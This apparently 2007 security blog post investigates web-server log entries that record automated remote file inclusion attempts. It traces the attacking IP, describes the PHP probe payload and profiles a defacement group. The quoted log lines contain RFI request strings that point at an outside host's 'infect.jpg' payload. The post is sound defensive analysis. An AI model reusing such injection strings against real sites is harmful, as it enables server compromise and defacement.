For some attackers, it’s just a matter of casting it out there to every possible target and hope something sticks. This sort of thing turns up fairly often in my logs, and probably yours too. This time, I’m going to use it to illustrate just how much intelligence you can gather about your attackers if you take some time to investigate. This particular example is a spectacular failure:
195.42.160.22 - - [30/Sep/2007:15:00:26 -0400] "GET /projects/goosweep/testhttp://www.infectsgroup.kit.net/infect.jpg? HTTP/1.0" 404 262 "-" "libwww-perl/5.48" 195.42.160.22 - - [30/Sep/2007:15:00:26 -0400] "GET /testhttp://www.infectsgroup.kit.net/infect.jpg? HTTP/1.0" 404 244 "-" "libwww-perl/5.48" 195.42.160.22 - - [30/Sep/2007:15:00:27 -0400] "GET /projects/testhttp://www.infectsgroup.kit.net/infect.jpg? HTTP/1.0" 404 253 "-" "libwww-perl/5.48" 195.42.160.22 - - [30/Sep/2007:15:00:31 -0400] "GET /projects/goosweep/testhttp://www.infectsgroup.kit.net/infect.jpg? HTTP/1.0" 404 262 "-" "libwww-perl/5.48" 195.42.160.22 - - [30/Sep/2007:15:00:32 -0400] "GET /testhttp://www.infectsgroup.kit.net/infect.jpg? HTTP/1.0" 404 244 "-" "libwww-perl/5.48" 195.42.160.22 - - [30/Sep/2007:15:00:32 -0400] "GET /projects/testhttp://www.infectsgroup.kit.net/infect.jpg? HTTP/1.0" 404 253 "-" "libwww-perl/5.48"
I’m not even very sure what vulnerability they’re trying to exploit here, if any. It almost looks as though they were just testing out their script, and happened to think it was a good idea to run it against a website that specializes in various aspects of computer security. This tells you something about the attackers to start with.
I’m going to cover a few easy investigative tricks you can do to find out more about an attack like this. I’m going to write this as I do it, so information I discuss earlier may be proven wrong by the end of the post. This is intentional, as it’s important to show how theories are formed based on evidence and then thrown out when something is found to contradict them.
First, consider the IP address, 195.42.160.22 . Let’s see what we can find out from it:
- It doesn’t show up in the logs anywhere else (nor does anything else 195.42.*.*)
- Most of the traffic in the minutes leading up to the attack are RSS readers looking at the blog. There’s no apparent “looking around” type traffic coming from any other IP addresses in the minutes leading up to the attempts.
- I wasn’t likely “chosen” for an attack so much as I was automatically spidered from a search query or other site.
- The IP address reverse-DNS’s to wizard.dataforce.net . Dataforce is a Russian ISP.
- Judging from the hostname, it seems like more of a server for the ISP than an individual’s workstation.
- So, it’s probably a machine they’ve managed to hack with a similar exploit, and they’re branching out.
- Looking on google, other sites’ logs and discussion reveal similar things coming from that IP address and host name:
- Windows 98 user agent?
- Attempts to grab lots of different php. Looks like attempts to find things they know how to RFI. As recent as in the past 24 hours.
- Some more attempts at what they did on my site. At least these attempts are better formatted than the ones in my logs:
- wizard.dataforce.net – - [02/Oct/2007:03:44:03 +0900] “GET /admin/index.php?=connection:absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.0″ 302 284
- wizard.dataforce.net – - [02/Oct/2007:03:44:05 +0900] “GET /index.php?=connection:absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.0″ 302 284
- This site appears to be hosted on wizard.dataforce.net. This supports the idea that this is a shared web host for the ISP’s customers.
- Several other sites have exposed access_logs revealing connections from wizard.dataforce.net, and a handful of other apparent web hosts attempting to RFI the same “infect.jpg”. Examples were noticed where “infect.jpg” was downloaded from other sites, as well. This also supports the idea that this is a branching-out and spreading type of attack.
That’s a good bit of information to gather from one IP address 
. Next, let’s look at the payload, “http://www.infectsgroup.kit.net/infect.jpg”:
- It’s not a real jpg of course. It’s PHP code. I’ve hosted it here, so you can take a look and follow along. I’ve taken out the opening and closing tags, so it’s not effective for remote-inclusion off of my own site
- Once you take the code and reformat it, you’ll see that it’s designed to spit out a few bits of information about the server, then attempt to run the “id” command to get the current user ID.
- There’s a big “ex()” function that tries to execute the command in many different ways.
- This code doesn’t really “do” much, but the results it spits back can be processed to determine if a server running an app vulnerable to RFI has been found. Presumably if it finds something, their script either saves the results in a report, or immediately moves to install a proper backdoor PHP shell.
- Looks like some french-speaking folk ran across it the other day
- The author of the script has been busy defacing websites (registration required, and I highly recommend it)
- Defacing in the name Kurdistan Security Team (with very slick ascii art!).
That about settles matters. For the sake of completion I searched through my logs for other connection that used the same User Agent string, “libwww-perl/5.48″. The only other connections were from another host just yesterday, attempting similar RFI attacks. The IP address turns out to be another shared host, in Germany this time, and the payload had already been taken down.
So what you see here is a shotgun approach to defacing a lot of pages and boosting their name up on Zone-H’s defacement archive. This is pretty basic stuff, but it’s a very interesting exercise to take a few log entries and expand out a profile for the attack and attackers. Hopefully you can apply this to your own incidents.
Very interesting.